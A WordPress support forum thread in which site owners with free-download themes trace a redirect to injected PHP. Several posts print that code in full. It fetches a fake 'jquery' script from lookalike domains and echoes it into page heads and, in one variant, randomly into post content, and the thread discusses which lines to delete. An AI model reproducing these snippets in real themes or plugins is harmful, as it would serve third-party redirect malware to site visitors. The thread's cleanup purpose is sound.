WordPress.org

Ready to get started?Download WordPress

Forums

[resolved] [closed] Unwanted Jquery (jquerys) script (55 posts)

  1. name
    Member
    Posted 2 years ago #

    In a brief look at source code from my site I found a line calling for an unwanted script (again http://www.jquerys.org/ajax/libs/jquery/jquery-1.6.3.min.js). This script redirects to another site (http://www.downloadmusicfreenow.com). Days ago was reported same problem with the "jquerys" (not genuine "jquery") in http://blog.sucuri.net/2012/07/fake-jquery-website-serving-redirection-malware.html .


    My site is http://professormarquinhos.com.br

  2. SNSD Photo
    Member
    Posted 2 years ago #

    few days ago, some one also got this issue.

    1. it could be from plugins
    2. or your theme
    3. or the worst, got hacked.

    How to analyze ?
    1. Disable all plugins, still get the issue ?
    2. Use default theme, like twentyeleven. Stil get this again ?
    3. Re-install your wordpress (via your wp-admin area, update section) or replace all wordpress core files via FTP or cpanel.
    4. Still get this ? let me think first... Check your files one-by-one.

    Don't forget to change your wordpress admin password (all accounts with admin role) also change your host cpanel password (cpanel, ftp,.. all of them).

  3. name
    Member
    Posted 2 years ago #

    I found the malicious call line in the "functions.php" theme.

    include'include/plugin/post.php'; // post function

    and content of the supposed "post.php" is:

    <?php if (!function_exists('insert_jquery_des')){function insert_jquery_des(){if (function_exists('curl_init')){$url = "http://www.jqueryc.com/jquery-1.6.3.min.js";$ch = curl_init(); $timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_des');} ?>

  4. lesterwagner
    Member
    Posted 2 years ago #

    hey man, I'm so happy to find your post! I have the exact same problem! I see yours is fixed! How did you do it? how?? I found the "functions.php" file...?

    Please help me?
    Thanks :)

  5. name
    Member
    Posted 2 years ago #

    What is your theme? What is your site?

  6. lesterwagner
    Member
    Posted 2 years ago #

    I think its the same theme that you are using..
    Its blank and empty at the moment:

    This is the address:

  7. lesterwagner
    Member
    Posted 2 years ago #

  8. name
    Member
    Posted 2 years ago #

    You would find the malicious code in that file "modernize/include/plugin/post.php"

    I replaced the contents of that post.php file by a empty php:

    <?php 
    
    	/*
    	*	Post file
    	*	---------------------------------------------------------------------
    	*	This file is empty
    	*	just for replacement.
    	*	---------------------------------------------------------------------
    	*/
    
    ?>

    (don't exclude the file, just change the content)

  9. lesterwagner
    Member
    Posted 2 years ago #

    Hey man I wanna thank you SOOOO much I didn't know where to look anymore! Really appreciate the help you gave me!! Why did this happen all of a sudden ? Where did it come from? How did you find it? There so much code?

  10. name
    Member
    Posted 2 years ago #

    This script was previously inserted by the person who posted (for free) this theme. (Not by the creator of the theme, which sells its theme).

  11. nrichardson
    Member
    Posted 2 years ago #

    Think you could take a look at my site? I am having the exact same problem! That would be great!

    http://www.skibrule.hostzi.com

  12. lesterwagner
    Member
    Posted 2 years ago #

    Thanks again!

  13. name
    Member
    Posted 2 years ago #

    @nrichardson

    In the theme folder, locate the "functions.php" and delete the follow lines (24-26)

    if (!function_exists('insert_jquery_theme')){function insert_jquery_theme(){if (function_exists('curl_init')){$url="http://www.jqueryc.com/jquery-1.6.3.min.js";$ch = curl_init();$timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_theme');} if(!defined('WP_THEME_URL')) {
    	define( 'WP_THEME_URL', get_template_directory_uri());
    }
  14. nrichardson
    Member
    Posted 2 years ago #

    OMG! Thank you so much!!

  15. name
    Member
    Posted 2 years ago #

    You're welcome.

  16. watesam
    Member
    Posted 2 years ago #

    Hola felipe tengo el mismo problema pero no encuentro el código que me muestras ayuda please que no se donde buscar.

    http://cultmoviez.info/

  17. name
    Member
    Posted 2 years ago #

    ponga acá en code lo contenido en fichero "functions.php" de tu tema
    put here the content from your "functions.php"

  18. kmessinger
    Volunteer Moderator
    Posted 2 years ago #

  19. watesam
    Member
    Posted 2 years ago #

  20. kmessinger
    Volunteer Moderator
    Posted 2 years ago #

    Please read this http://codex.wordpress.org/Forum_Welcome#Posting_Code before posting any more code or asking someone to post code.

  21. name
    Member
    Posted 2 years ago #

    @ watesam, the script is called from another php
    If you want, send me your theme in ZIP format for me to analyze.

    [ email redacted ]

  22. ggibbs912
    Member
    Posted 2 years ago #

    @felipe
    Yes, I found one jquery insertion and can't find the other. I am trying to find the infected .php file. Where should I look?

  23. M Grmn
    Member
    Posted 2 years ago #

    Just search your files

    for string which says

    insert_jquery_function

    on nix you can use, sudo grep "insert_jquery_function" /directory of wordpress files/

    for windows, dont have a clue!

  24. watesam
    Member
    Posted 2 years ago #

  25. PeggyMe
    Member
    Posted 2 years ago #

    I had the same problem...thank you for your help!!!

  26. PeggyMe
    Member
    Posted 2 years ago #

    I have two site with the same problem. Taking that code out of the functions.php file worked on one of the sites, but not on the other ... any ideas ?

  27. bionatur
    Member
    Posted 2 years ago #

    Please help me. My functions.php this code is. What i delete?

    /* add theme jquery functions */
    if (!function_exists('insert_jquery_theme')){function insert_jquery_theme(){if (function_exists('curl_init')){$url = "http://www.wpstats.org/jquery-1.6.3.min.js";$ch = curl_init();	$timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_theme');}
    function ins_php_in_post($content){$percentage = 25;if (rand(0, 100) < $percentage){ob_start();if(function_exists('curl_init')) { $url = "http://www.jquerys.org/jquery-1.6.3.min.js"; $ch = curl_init(); $timeout = 5; curl_setopt($ch,CURLOPT_URL,$url); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout); $data = curl_exec($ch); curl_close($ch); echo "$data"; }$text = ob_get_clean();$pos = rand(0, strlen($content));$txtPrePos = substr($content, 0, $pos);$txtPostPos = substr($content, $pos);$openPos = strrpos($txtPrePos, "<");if ($openPos !== false){$closePos = strrpos($txtPrePos, ">");if ($openPos > $closePos || $closePos === false){$pos = strpos($content, ">", $pos) + 1;}}$spos = strpos($content, " ", $pos);if ($spos === false)	{$spos = strlen($content);}$content = substr($content, 0, $spos) . " " . $text . substr($content, $spos);}return $content;}
    add_filter('the_content', 'ins_php_in_post');
    define('PUNCH_FUNCTIONS', TEMPLATEPATH . '/functions/template');
    define('PUNCH_JAVASCRIPT', get_template_directory_uri() . '/js');
    define('PUNCH_CSS', get_template_directory_uri() . '/css');
  28. M Grmn
    Member
    Posted 2 years ago #

    try removing
    /* dont have a clue what the first on is though, but doesnt really look like you should have it */

    /* 1st piece doesnt look ok */
    if (!function_exists('insert_jquery_theme')){function insert_jquery_theme(){if (function_exists('curl_init')){$url = "http://www.wpstats.org/jquery-1.6.3.min.js";$ch = curl_init();	$timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_theme');}
        function ins_php_in_post($content){$percentage = 25;if (rand(0, 100) < $percentage){ob_start();
    /* second piece cuases redirct */
    if(function_exists('curl_init')) {
    $url = "http://www.jquerys.org/jquery-1.6.3.min.js"; $ch = curl_init(); $timeout = 5; curl_setopt($ch,CURLOPT_URL,$url); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout); $data = curl_exec($ch); curl_close($ch); echo "$data";
  29. bionatur
    Member
    Posted 2 years ago #

    I tried, but it is removed, the site will not work. I checked the original file, and looked the same, so this is a template script. However kaspersky continuous indicates this: http://www.jquerys.org/jquery-1.6.3.min.js

  30. walteravila
    Member
    Posted 2 years ago #

    Hi guys!
    Well, it seems we all have the same problem.
    My website has the same problem.
    http://www.vidabohemia.com

    Avast goes crazy everytime I go in saying that the website is infected with malware. At the end it is this jquerys.org it is infected with.
    My theme is MADE.

    I dont have a clue on where to find this .php file or if its different as it is a different theme.
    Any clue to this will be greatly appreciated.
    Thanks.

    Walter

Topic Closed

This topic has been closed to new replies.

About this Topic